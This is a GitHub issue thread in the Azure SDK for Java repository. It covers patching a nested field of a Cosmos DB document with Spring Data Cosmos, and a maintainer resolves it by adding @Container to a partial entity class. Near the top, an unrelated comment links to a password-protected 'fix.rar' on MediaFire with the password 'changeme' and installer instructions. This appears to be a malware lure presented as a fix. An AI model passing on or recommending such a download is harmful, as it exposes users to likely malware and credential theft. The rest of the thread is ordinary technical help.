### ISSUE TITLE
[QUERY] Azure Spring Data Cosmos Partial Document Update: Do I need Id and _etag?

### ISSUE THREAD

**Issue by MapFilterMagic** [Azure/azure-sdk-for-java#41643]
**Query/Question**
I’m working with the patch feature with Spring Data Cosmos (Java Spring Boot). I have a scenario where I need to patch a field in a deeply nested object within my main document class, `User`.

Suppose that I need to update a flag within `User` at the path `myParentField.flagImPatching`. However, the application I'm working on does not have access to the full `User` document or model; it only has access to the `MyParent` class (the type of the `myParentField` field within `User`). Here’s an outline of the models:

```java
public class User {
    @Id
    private String userId;

    @Version
    private String _etag;

    private int count;

    @PartitionKey
    private String somePartitionKeyValue;

    private MyParent myParentField;

    private SomeOtherParent otherParent;

    private AnotherParent anotherParent;

    // has other fields too...
}
```

```java
public class MyParent {
    private boolean flagImPatching;
}
```

In my patch operation, I’d like to update `flagImPatching` within `MyParent` using the `CosmosPatchOperations` functionality.

**Questions:**

1. Can I pass `PartialUser.class` to `Repository.save()` like this instead of `User.class` (and instead of a `UserRepository`) when applying the patch operation? Given that `myParentField` is a child-object within `User`, would this still correctly update the `User` document in Cosmos DB? Even if my repository only knows about `PartialUser`?

2. Regarding the patch operation: The `User` model includes an `@Id` for the document ID and a `@Version` annotated field for the `_etag` (for optimistic concurrency; consider I want to enforce it here too). Do I need to supply these fields when performing the patch operation with `CosmosPatchOperations`, even if I’m only updating a specific nested field? I've shown that below.
Here’s how I’m considering the operation, even though I don’t have access to the full `User` object (taken from an example here: https://github.com/Azure/azure-sdk-for-java/pull/32630):

```java
@Repository
public interface PartialUserRepository extends CosmosRepository<PartialUser, String> { }
```

```java
public class PartialUser {
    @Id
    private String userId;

    @Version
    private String _etag;

    private MyParent myParentField; 
}
```

```java
CosmosPatchOperations patchOperations = CosmosPatchOperations
	.create()
	.replace("/myParentField/flagImPatching", true);

// Assuming I have the necessary identifiers (userId and partition key)
// but I only have access to MyParent class, not the full User (so I've just stuck it inside a container PartialUser)
PartialUser patchedPartialUser = partialUserRepository.save(userId, new PartitionKey(partitionKeyValue), PartialUser.class, patchOperations);
```

***Why is this not a Bug or a feature Request?***
This is not a bug or a feature request; I have a question around how this feature of the SDK works, as there is no comprehensive documentation around how to use it beyond the GitHub issue(s) that asked for this functionality in previous years, and then the GitHub PR description that introduced the feature into the SDK.

**Setup (please complete the following information if applicable):**
N/A
 
 **Information Checklist**
- [X] Query Added
- [X] Setup information Added

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kushagraThapar** [comment]
@trande4884  can you please look at this, thanks!

**Comment by trande4884** [comment]
@MapFilterMagic thank you for reaching out about this. Let me do some more research and I will get back to you. It seems to me like the core of the problem is you only have access to the nested object and you want to make sure that when you update the nested object "MyParent" that it also updates the record in the "User" object is that correct? Is there a reason for creating the "PartialUser" class and not just updating the "MyParent" object directly?

**Comment by MapFilterMagic** [comment]
> @MapFilterMagic thank you for reaching out about this. Let me do some more research and I will get back to you. It seems to me like the core of the problem is you only have access to the nested object and you want to make sure that when you update the nested object "MyParent" that it also updates the record in the "User" object is that correct? Is there a reason for creating the "PartialUser" class and not just updating the "MyParent" object directly?

I appreciate the follow-up! Yes, that's correct.

I guess that spans part of my question. If I only needed to update `MyParent`, what is my repository looking like?

```
@Repository
public interface MyParentRepository extends CosmosRepository<MyParent, String> { }
```
^This?

And then I'm doing this to patch the field?

```java
CosmosPatchOperations patchOperations = CosmosPatchOperations
	.create()
	.replace("flagImPatching", true);

MyParent patchedMyParent = MyParentRepository.save(userId, new PartitionKey(partitionKeyValue), MyParent.class, patchOperations);
```

As far as why I need the `PartialUser`, Service A originally writes the `User` document to the DB. Service B needs to clean up a nested field on that document, but also, it needs to manipulate the `ttl` on `User` to offset it. I don't want Service B extending the lifespan of the document if it ends up patching the value a significant time later. If the TTL was originally 3 days, and a day has passed, I'll update the TTL to 2 days when I'm patching. Separately, I want to maintain enforcement of optimistic concurrency. And `ttl` and `_etag` wouldn't live in `MyParent`; they'd live on actual `User` document right?

**Comment by trande4884** [comment]
@MapFilterMagic thank you for the further context. That Repository class is fine for what you are trying to do. I think the real issue you have with your application is that you do not have the full User. If you have the UserId you should be able to just use that to fetch the full User, which you likely will have to do anyway to get the PartitionKey which is required for Patch. If you have the UserId and PartitionKey values in the application you won't even need the PartialUser, as you can just use these two pieces to update the User table via the Patch command. As it stands the MyParent on your User and PartialUser are two different objects and updating one would not update the other, so you would need some additional implementation, potentially something like Change Feed, in order to achieve this.

**Comment by MapFilterMagic** [comment]
> @MapFilterMagic thank you for the further context. That Repository class is fine for what you are trying to do. I think the real issue you have with your application is that you do not have the full User. If you have the UserId you should be able to just use that to fetch the full User, which you likely will have to do anyway to get the PartitionKey which is required for Patch. If you have the UserId and PartitionKey values in the application you won't even need the PartialUser, as you can just use these two pieces to update the User table via the Patch command. As it stands the MyParent on your User and PartialUser are two different objects and updating one would not update the other, so you would need some additional implementation, potentially something like Change Feed, in order to achieve this.

I already know what the PartitionKey will be. It's just the UserID.

**Comment by trande4884** [comment]
@MapFilterMagic you should be able to just add `@Container(containerName = "User")` to your PartialUser class, which will make it point to the same container as the User class (assuming you haven't also defined a containerName for that one, the container names just need to match) and then you can patch as you have above just with using a PartialUserRepository. I will test this out on my end in the next few days to confirm the functionality, if you have time to test in the meantime please let me know if it works as expected.

**Comment by trande4884** [comment]
I was just able to test this and I successfully updated the value and the etag was updated, please let me know if you need me to share the actual files I used or if the above makes sense!

**Comment by MapFilterMagic** [comment]
> I was just able to test this and I successfully updated the value and the etag was updated, please let me know if you need me to share the actual files I used or if the above makes sense!

Fairly certain I've got it, but do you mind passing over the files for reference? One of my other engineers are likely to pick up this work and not me. Much appreciated!

**Comment by trande4884** [comment]
Here would be the files, glad we got a solution on this for you!

```
public class User {
    @Id
    private String userId;

    @Version
    private String _etag;

    private int count;

    @PartitionKey
    private String somePartitionKeyValue;

    private MyParent myParentField;

    private SomeOtherParent otherParent;

    private AnotherParent anotherParent;

    // has other fields too...
}
```

```
public class MyParent {
    private boolean flagImPatching;
}
```

```
@Repository
public interface PartialUserRepository extends CosmosRepository<PartialUser, String> { }
```

```
@Container(containerName = "User")
public class PartialUser {
    @Id
    private String userId;

    @Version
    private String _etag;

    private MyParent myParentField; 
}
```

```
CosmosPatchOperations patchOperations = CosmosPatchOperations
	.create()
	.replace("/myParentField/flagImPatching", true);

PartialUser patchedPartialUser = partialUserRepository.save(userId, new PartitionKey(partitionKeyValue), PartialUser.class, patchOperations);
```
